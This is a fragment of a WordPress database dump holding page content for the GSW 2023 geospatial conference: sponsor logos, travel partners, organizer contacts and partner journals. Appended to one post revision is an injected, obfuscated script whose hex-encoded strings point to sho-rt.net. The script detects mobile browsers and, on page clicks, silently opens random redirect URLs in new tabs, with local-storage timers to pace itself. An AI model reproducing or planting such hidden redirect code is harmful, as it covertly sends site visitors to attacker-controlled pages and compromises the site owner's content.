dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:20:32','2023-08-13 12:20:32','',3066,'https://gsw2023.com/?p=5107',0,'revision','',0),
(5108,1,'2023-08-13 12:23:56','2023-08-13 12:23:56','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 105px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p 